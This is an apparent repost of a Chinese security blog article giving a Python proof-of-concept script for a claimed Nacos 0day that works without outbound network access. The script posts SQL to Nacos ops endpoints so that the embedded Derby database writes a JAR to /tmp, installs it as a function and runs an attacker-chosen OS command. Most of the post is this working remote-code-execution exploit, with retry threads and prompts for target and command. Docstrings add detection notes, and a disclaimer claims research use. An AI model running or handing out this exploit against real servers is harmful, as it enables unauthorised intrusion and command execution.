0x01 前言
昨天就有朋友问到不出网的打法，今天看到有人提到可以用 SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE 来写入文件。
0x02 分析与利用
写好jar,将其放到当前目录,运行脚本会读取jar并写到目标/tmp目录,创建UDF函数并执行。
目录可根据情况更改。
"""Proof-of-concept script from the article above.

It pushes a JAR into a Nacos-embedded Derby database through the Nacos ops
endpoints and then queries a Derby function registered from that JAR.  Nothing
about the JAR itself is on this page; the ``EXTERNAL NAME`` below is
``test.poc.Example.exec`` and the script presumably expects it to run
``command`` — that is an assumption about the JAR, not something this file shows.

Everything a defender needs to recognise this traffic is visible here:

* a multipart POST to ``/nacos/v1/cs/ops/data/removal`` whose ``file`` part is
  SQL text containing ``SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE``, ``SQLJ.INSTALL_JAR``,
  ``derby.database.classpath`` and ``CREATE FUNCTION``;
* a GET to ``/nacos/v1/cs/ops/derby`` with the SQL in the ``sql`` query parameter;
* files under ``/tmp`` named with 8 random alphanumerics, one with a ``.jar``
  suffix, and a Derby function named ``S_EXAMPLE_<8 letters>``.

Both endpoints being reachable from outside an operator network is the
condition the script relies on; the responses are only inspected for the
``message`` / ``data`` keys of the upload reply.
"""
import random
import sys  # imported but not used anywhere in this file
import requests
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor, as_completed


def execute_task(target: str, command: str, jar_hex: str, removal_url: str, derby_url: str, id: str, random_filename: str) -> "str | None":
    """Run one upload-then-query attempt against the two Nacos endpoints.

    Args:
        target: not referenced in this function; the URLs arrive pre-built.
        command: substituted verbatim inside single quotes in ``get_sql``, so a
            value containing ``'`` breaks the statement rather than being escaped.
        jar_hex: hex encoding of the JAR bytes, embedded as an ``X'..'`` literal.
        removal_url: the ``/nacos/v1/cs/ops/data/removal`` endpoint.
        derby_url: the ``/nacos/v1/cs/ops/derby`` endpoint.
        id: random 8-letter suffix used for the JAR alias ``APP.<id>`` and the
            function name ``S_EXAMPLE_<id>``.  NOTE: shadows the builtin ``id``.
        random_filename: random 8-character base name for the two files in /tmp.

    Returns:
        The raw body of the derby GET when the upload reply is JSON with no
        ``message`` key and a non-null ``data`` key; ``None`` otherwise.

    Raises:
        Whatever ``requests`` raises on transport errors, and a ``ValueError``
        subclass from ``Response.json()`` when the upload reply is not JSON —
        nothing is caught here.
    """
    # SQL sent as the uploaded "file": writes the blob to /tmp/<name>.jar, installs
    # it as a Derby JAR, puts it on the database classpath and declares a Java
    # function backed by it.  The string is sent byte-for-byte as shown.
    post_sql = f""" CALL SYSCS_UTIL.SYSCS_EXPORT_QUERY_LOBS_TO_EXTFILE('values cast(X''{jar_hex}'' as blob)', '/tmp/{random_filename}', ',', '"', 'UTF-8', '/tmp/{random_filename}.jar') CALL SQLJ.INSTALL_JAR('/tmp/{random_filename}.jar', 'APP.{id}', 0) CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath', 'APP.{id}') CREATE FUNCTION S_EXAMPLE_{id}(PARAM VARCHAR(2000)) RETURNS VARCHAR(2000) PARAMETER STYLE JAVA NO SQL LANGUAGE JAVA EXTERNAL NAME 'test.poc.Example.exec' """
    # Built but never sent anywhere — dead code as written.
    option_sql = f"UPDATE ROLES SET ROLE='1' WHERE ROLE='1' AND ROLE=S_EXAMPLE_{id}('{command}')"
    # Query that invokes the new function; ``command`` is interpolated unescaped.
    get_sql = f"SELECT * FROM (SELECT COUNT(*) AS b, S_EXAMPLE_{id}('{command}') AS a FROM config_info) tmp /*ROWS FETCH NEXT*/"
    files = {'file': post_sql}
    post_resp = requests.post(url=removal_url, files=files)
    # Response.json() raises when the body is not JSON; no handling here.
    post_json = post_resp.json()
    # Upload is treated as accepted only when there is no 'message' and a non-null
    # 'data'.  What the server means by those keys is not visible in this file.
    if post_json.get('message', None) is None and post_json.get('data', None) is not None:
        get_resp = requests.get(url=derby_url, params={'sql': get_sql})
        return get_resp.text
    return None


def exploit(target: str, command: str, jar_file_path: str, max_workers: int = 5) -> None:
    """Submit batches of ``execute_task`` attempts until one returns a body.

    Args:
        target: base URL; the two endpoint paths are joined onto it with urljoin.
        command: passed through to ``execute_task`` unchanged.
        jar_file_path: local path of the JAR that is read and hex-encoded once.
        max_workers: thread-pool size and also the number of attempts per batch.

    Returns:
        ``None``.  Prints the first non-empty result and returns.  There is no
        attempt limit: if every attempt returns ``None`` (endpoint absent, reply
        not accepted) the ``while True`` loop below never ends.
    """
    removal_url = urljoin(target, '/nacos/v1/cs/ops/data/removal')
    derby_url = urljoin(target, '/nacos/v1/cs/ops/derby')
    # Read the local JAR once.
    with open(jar_file_path, 'rb') as jar_file:
        jar_data = jar_file.read()
    # Hex-encode it for the X'..' literal in the SQL.
    jar_hex = jar_data.hex()
    with ThreadPoolExecutor(max_workers=max_workers) as executor:
        while True:
            futures = []
            for i in range(max_workers):
                # Submit max_workers tasks per batch, each with fresh random names.
                # random.sample draws without replacement, so each name is 8 distinct characters.
                id = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', 8))
                random_filename = ''.join(random.sample('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789', 8))
                futures.append(executor.submit(execute_task, target, command, jar_hex, removal_url, derby_url, id, random_filename))
            for future in as_completed(futures):
                # future.result() re-raises any exception from execute_task.
                result = future.result()
                if result:
                    print(result)
                    # The enclosing ``with`` still calls shutdown(wait=True) on
                    # exit, so the rest of this batch is awaited anyway.
                    executor.shutdown(wait=False)
                    return  # exit once a usable result has been found


if __name__ == '__main__':
    target = 'http://127.0.0.1:8848'
    command = 'whoami'
    jar_file_path = 'download.jar'  # replace with your default JAR path
    # Each prompt falls back to the default above when the input is empty.
    target = input('请输入目录URL,默认:http://127.0.0.1:8848:') or target
    command = input('请输入命令,默认:whoami:') or command
    jar_file_path = input('请输入JAR包文件路径,默认:download.jar:') or jar_file_path
    exploit(target=target, command=command, jar_file_path=jar_file_path)
原文始发于微信公众号(小黑说安全):Nacos 0day 不出网利用脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。